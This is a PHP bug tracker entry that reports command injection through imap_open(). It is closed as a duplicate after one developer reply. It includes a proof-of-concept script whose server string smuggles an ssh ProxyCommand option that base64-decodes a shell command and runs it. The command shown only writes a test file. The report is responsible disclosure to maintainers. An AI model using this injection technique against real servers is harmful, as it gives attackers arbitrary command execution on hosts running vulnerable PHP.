php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #77160 Script injection in imap_open()
Submitted: 2018-11-15 09:09 UTC Modified: 2019-02-21 05:11 UTC
From: hanno at hboeck dot de Assigned: cmb (profile)
Status: Duplicate Package: IMAP related
PHP Version: 7.2.12 OS:
Private report: No CVE-ID: None
View Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
If you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: hanno at hboeck dot de
New email:
PHP Version: OS:

 

 [2018-11-15 09:09 UTC] hanno at hboeck dot de
Description:
------------
I just saw this posted on reddit and wanted to make sure PHP takes note, I haven't found it mentioned in the bug database yet:
https://github.com/Bo0oM/PHP_imap_open_exploit

It seems imap_open() has some kind of shell injection. This is advertised as an exec() bypass if exec() is not allowed, however I could also imagine this opens up a security problem in case you have any kind of imap frontend that allows users to configure their own server.

Likely the input to the function should be properly sanitized.

Test script:
---------------
<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2018-11-15 10:39 UTC] cmb@php.net
-Status: Open +Status: Duplicate -Assigned To: +Assigned To: cmb
 [2018-11-15 10:39 UTC] cmb@php.net
Thanks!  This has already been reported as bug #77153, though.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Thu Nov 21 20:01:29 2024 UTC